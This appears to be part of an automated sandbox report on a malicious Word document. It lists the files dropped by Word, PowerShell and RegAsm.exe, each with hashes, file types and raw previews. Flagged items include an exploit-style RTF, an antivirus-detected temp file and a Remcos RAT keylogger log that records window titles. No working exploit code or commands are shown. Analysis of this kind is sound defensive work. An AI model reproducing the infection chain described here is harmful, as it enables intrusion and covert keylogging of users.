                                                                                                                                                                                                Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n......................................... w. ..0.......)".A.l*w"........atQ.........l*w.........`tQ........0...../....j...........D...../j...........T...{./j.....*wd....O./j.......8....I./ ...h....Y..I./)".A

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70910273.emf

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):213168
                                                                                                                                                                                                Entropy (8bit):2.988970416935335
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:oR4CEQoVghaqdV+9ccR9qyn6z0G1+/WQOyFBUXjM9G2j58ThJAbH92f2bcrjZd0R:l9tkQRmQzpr5Txp1
                                                                                                                                                                                                MD5:33B91CBFFE8E675C476B0BA3AFC61062
                                                                                                                                                                                                SHA1:447B4D09F2D65DBFB28462556A33A047394E8D97
                                                                                                                                                                                                SHA-256:C81DE0EEC367CC4FDDADC14B92EA89BE12C856ACD249D45F93FCD69A8D50FD79
                                                                                                                                                                                                SHA-512:3EBB6F881334115B52FC4F426A4F681B22645B967FA03BF367C43CD7BB078C74BBFB7F41ABBB6132429704CB6E338808468E607298B999B63C7D246DA03750F2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:....l............................E...U.. EMF.....@..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d.......n......._.......n...|.......!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Rich Text Format data, version 1
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):115666
                                                                                                                                                                                                Entropy (8bit):2.7217050368726605
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:HbOllnkypEIfyvM33gbahiDgN16h6jifrQQW079:HalkypEIZngbawDgN8hF8Qr79
                                                                                                                                                                                                MD5:5EAD5713E1263695BFF52404264DD3B4
                                                                                                                                                                                                SHA1:19420DE3C322F058F5C55D6C2A18CF27BD2CE856
                                                                                                                                                                                                SHA-256:DC2E7684F8C21142383906E061BE62128064D2BE6C8EB15C773EAE3952615281
                                                                                                                                                                                                SHA-512:A4B678ECC350CABAB55DAC7D79B735CF9F2C79738037AE5BD1A290D13F5EEFF7E791B37F6A47FE9CF6D0BA061F8D3B0FD235C867B655EE378DB39D0D874B8906
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc, Author: ditekSHen
                                                                                                                                                                                                Preview:{\rtf1..{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}..{\17485111591[2251+);5/!@*:4_[?9`9.'|>!9<!^3%+^|~%*?+2<7%:.`?]1|?=,8%.~#/:%?<<!|$6%+?9%!2?.%=_]11''9?37%8~7?$/,#.&+2:/)_.';-]|?=!*)?*(]&44`1*.8?:@<_.$.,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%.).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|).&%6;?@/~./?.=,?313$!.~94#3.[[.~4_(?]:@~[`%##>!!`.7.$!+#.&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~.?<82:[<%?%?/._2;[/?7?*.40,^.!?(@]%4^!:~.%-@(.4'58!.3:)(+.=?.-24?^?.;?=?`._[*$;^_;;8#.7='6:_**/56-;=%]58^,#.<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=./077<.3.##(**7?.?)1=3.1'%.5*54~]`[0%&<$].?0;%2,)%:6$.`[+&2?%2[~7]]?_9$$8?.]??_.[5%)$05?.6%3|6.3?|@~.-::=<?;%|50;0^?.29[??_?_:#!.(%9[*'@51/2`?~!+/*..!-]?).^`?.?])=&#.'*@6?,[=/.~?@.?^?279;5=&'??'`|@;2[1^4*|0][7`3%$?..7(0<]^.8!18&[;,~243-:49!'#!.%0@(+.8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B82E11BA.emf

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):318964
                                                                                                                                                                                                Entropy (8bit):5.498202232475241
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:hxelS/aoQOP7D4mD3f5R81Zk6ZJE6GOolsvm8:hxelSL34mD3f5ReZdZJElOFm8
                                                                                                                                                                                                MD5:1E74425F96A5DDD00E5494225278C22A
                                                                                                                                                                                                SHA1:97D7ADC10C419F1EBF2B2754CDFEFD3371CD95B9
                                                                                                                                                                                                SHA-256:420C08455ABFF24376B505BC34EE9021A10C5BF5285D3FD038778409EC78B67C
                                                                                                                                                                                                SHA-512:E0232C415E1171AABA244152F0D4CDD8328E0EF051FC24CFD2B472199A0AE41A451401A3492C04A612A9ACD3407047047C8A170A4B2A68EB80B4B862B699EA1B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:....l...............2...........@m..?... EMF........ .......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB91F1D8.emf

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):66768
                                                                                                                                                                                                Entropy (8bit):2.9045642362096498
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:gQbwIVguebyln1oBJ7v4rPMPRDJWKf4kfeHHCCKlRFwiACs:gQb5Tebyl1ojvw4RlWKf41HHC/KiACs
                                                                                                                                                                                                MD5:7DC8E1999A1AF96FE63D5E493356A288
                                                                                                                                                                                                SHA1:705D5C1FFDF27BF31F6408A1F98FA01547375612
                                                                                                                                                                                                SHA-256:611408FC701324B9EE55DE35EF19AA58103007691865E3900EC6E03BDE70F0C9
                                                                                                                                                                                                SHA-512:9275DD7D20A0EC72C0E8F1291EEB2237E6464857B50D114E3F615CFC27199EB07256BA65DD04BFDD664EAEBCC50909370D0E42FC10DA8863C3D6413B54DBB622
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:....l...........k...................@.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l.......'.......................%...........................................................L...d...........#...X...........$...C...!..............?...........?................................'.......................%...........(.......................L...d...#.......k...X...#.......I...

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Microsoft Corporation, Last Saved By: 91974, Name of Creating Application: Microsoft Excel, Last Printed: Mon Jul 15 16:30:47 2024, Create Time/Date: Mon Oct 21 12:03:58 1996, Last Saved Time/Date: Mon Sep 30 09:11:40 2024, Security: 0
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1921536
                                                                                                                                                                                                Entropy (8bit):5.057631864548071
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:WHmzCJEfXMGrc6/XRmzHJElD3DERnLRmF8Dbc3W0J:W1Kzrc0AEbARM8f2
                                                                                                                                                                                                MD5:EC6F53BCFBAD65918025B30289922BFE
                                                                                                                                                                                                SHA1:2A25AEDE88BFA6BCF86115FFE85ADA4B91F6D13C
                                                                                                                                                                                                SHA-256:C5C91C491999965E299CA8B95FC3071D5737888AAF0BD24036969CDEB9E76728
                                                                                                                                                                                                SHA-512:D5E9F31B4A6E5B844427CE5FA49E0D402EAC9C1DDC22A351C5962F2B45311ADC79922CA723129DDA5986D1459891D488F18250D489A8EEC2BA187079475EBF42
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................~.......T........................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2A829E0A-7FC7-4D01-A6EB-6F0871F5882C}.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1024
                                                                                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7145407E-C3A4-423E-9375-10CCCC5BE751}.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1536
                                                                                                                                                                                                Entropy (8bit):2.8462879894458504
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:YXHH3HpkyKptyKpkyKptECbeT+dE/fd0Ivk2WWHsmXT7MTe2IXTesZSDMz:In3jK+KjKDrd8NvRsMXMHmyMz
                                                                                                                                                                                                MD5:8024A9B919C00968F5F9BBE6B6B6226B
                                                                                                                                                                                                SHA1:33A9B07B4709CAB429DB14CEA49A9B538305F51A
                                                                                                                                                                                                SHA-256:7CEB9E403F7C09773FC2646D85D42C6F97B0641B35BC74A2ACDBA6AF9AD7088E
                                                                                                                                                                                                SHA-512:CA97FF409D7F96DBB570C0FB03D21F0083A3349F72CBDF95EC04A70E9E868DC5D18BB5F8E43ADCAD068E6B003E5E2623C1D2F72785E9EC99F604E8DF03996579
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>...........................E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . ...5.4.=.5...5._.2.......................................................................................................................................................................................................t...v...x...z...~............................................................................................................................................................................................................................................................................................................................................................................................................d........gd........

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FB277FB3-9DA0-41AB-818A-1B325FC5268F}.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15392
                                                                                                                                                                                                Entropy (8bit):3.6169394259377343
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:7V3yfuaKs05qt4rdS8pAcc/+He4zYh83mVWpwpSJM5CJ:x3yfuX1wtUS8acvek3rkLCJ
                                                                                                                                                                                                MD5:03B2C6040807D398FF34A9CAC8D057E6
                                                                                                                                                                                                SHA1:60D974140A3C7EE48E7214FE809947AAE0124332
                                                                                                                                                                                                SHA-256:BA17C33D3F6D7A63E1753150C98727ADB07352BFEED7AE9F57964D2B4D99975D
                                                                                                                                                                                                SHA-512:398148D1136AE2BCBE14A91C415B7E36BA1981987CA408F5B1CAB59EA8201EA94B20ACE89CE3517C6E71F9DB90220857166FD540CC8AF93FF98328D5124605E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:7.4.8.5.1.1.1.5.9.1.[.2.2.5.1.+.).;.5./.!.@.*.:.4._.[.?.9.`.9...'.|.>.!.9.<.!.^.3.%.+.^.|.~.%.*.?.+.2.<.7.%.:...`.?.].1.|.?.=.,.8.%...~.#./.:.%.?.<.<.!.|.$.6.%.+.?.9.%.!.2.?...%.=._.].1.1.'.'.9.?.3.7.%.8.~.7.?.$./.,.#...&.+.2.:./.)._...'.;.-.].|.?.=.!.*.).?.*.(.].&.4.4.`.1.*...8.?.:.@.<._...$...,.2.6.=.#.6.#.`.?.^.~.$.5.9.>.<./.%.~.%.%.=.*.?.4.@...4.=.?.?.2.4.~.?._.=.%...)...^._.^.[.*.1.|.7.#.$.*.$.%.>.7.8...$./...).7._.].?.,.2.8.4.).0.+.`./.7.*.6.>._.+.~.5.5.>.*.9.;.@.=.2.|.)...&.%.6.;.?.@./.~.../.?...=.,.?.3.1.3.$.!...~.9.4.#.3...[.[...~.4._.(.?.].:.@.~.[.`.%.#.#.>.!.!.`...7...$.!.+.#...&.,.~.=.[.#.?.*.'._.].;.^.3.].[.6.!.@.|.?.;.%.8.<.@.<.].).8...#.-.8.2.>.=.'._./.7.7.6.6.:.`.8.*._.*.`.,.~...?.<.8.2.:.[.<.%.?.%.?./..._.2.;.[./.?.7.?.*...4.0.,.^...!.?.(.@.].%.4.^.!.:.~...%.-.@.(...4.'.5.8.!...3.:.).(.+...=.?...-.2.4.?.^.?...;.?.=.?.`..._.[.*.$.;.^._.;.;.8.#...7.=.'.6.:._.*.*./.5.6.-.;.=.%.].5.8.^.,.#...<.*...%./.*.%.8.).(.&.#.(.$.%.|.|.!.-...|.8.|.`.).0.'.!.8...?.[.@.(.%.&.%.;.4.-.;.

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\0gqtl14z.fpz.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4ob2hxgr.cs2.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ao0qbvdc.oc4.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bhvACB4.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3193001d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21037056
                                                                                                                                                                                                Entropy (8bit):1.138859744193261
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:YO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:YOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                MD5:0E0D23800D2C6377BA7381EFFD6EAE7A
                                                                                                                                                                                                SHA1:A2E48DE09EE5B7943723CC4A55A4F0C6D076B0C1
                                                                                                                                                                                                SHA-256:2E37BC246DEC4F20276088517433D3324E80A1B6A4ABEC57003CB3288BF04381
                                                                                                                                                                                                SHA-512:4F0D94F7345E328ACFF76999D6A2D8CA4B96CBA5CD7617C12405FE0FBBE1994EB6DA1B3583047ADCD910428CC2EDA523D608D143EC01EBDE76EDC82D65BDF69E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bhvC227.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3193001d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21037056
                                                                                                                                                                                                Entropy (8bit):1.138859744193261
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:YO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:YOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                MD5:0E0D23800D2C6377BA7381EFFD6EAE7A
                                                                                                                                                                                                SHA1:A2E48DE09EE5B7943723CC4A55A4F0C6D076B0C1
                                                                                                                                                                                                SHA-256:2E37BC246DEC4F20276088517433D3324E80A1B6A4ABEC57003CB3288BF04381
                                                                                                                                                                                                SHA-512:4F0D94F7345E328ACFF76999D6A2D8CA4B96CBA5CD7617C12405FE0FBBE1994EB6DA1B3583047ADCD910428CC2EDA523D608D143EC01EBDE76EDC82D65BDF69E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\notpad0\logs.dat

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                Entropy (8bit):3.5101427677233845
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:6lQl0lPNMCl55YcIeeDAlb40QKlAlQ8HSNombQOfxNa/WAv:6lw0lqmhech4RlQ8Hyp50/W+
                                                                                                                                                                                                MD5:E1DABB4D78C1419C7EF919F54522F95D
                                                                                                                                                                                                SHA1:15C4F1E2BA4196A645C9606F7FBD7FA2630EC319
                                                                                                                                                                                                SHA-256:9C38955F016DFA84E6FC10A943CB076E783750EFAF0B9B702C18DF98B8229486
                                                                                                                                                                                                SHA-512:F74717D81910CBD0FA3A850C95CC77E79715B1ED11B5848D230BF05EE100B6BDD83D4B867F4D20E274C0DC9DE6672E1E1A36BE9F07DB396E7DA446611BBABBAD
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, Author: Joe Security
                                                                                                                                                                                                Preview:....[.2.0.2.4./.0.9./.3.0. .1.0.:.2.4.:.3.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.A.M.G. .C.a.r.g.o. .L.o.g.i.s.t.i.c. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\zodwa00f.b2s.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\{264E6551-B505-4744-8418-254F7EAA1471}

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                                                Entropy (8bit):0.025623734588153504
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:I3DPcJ64SHvxggLRjOZNEvHRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYGnOCvBvYg3J/
                                                                                                                                                                                                MD5:5D65BF2221243FB28855F824B066129B
                                                                                                                                                                                                SHA1:C06C438DE27EC2916CB11C696D61AFF9D631570A
                                                                                                                                                                                                SHA-256:F09D6501CE467A47318A59BD445C8CDD763804D08445BA37004D44CCE0A40396
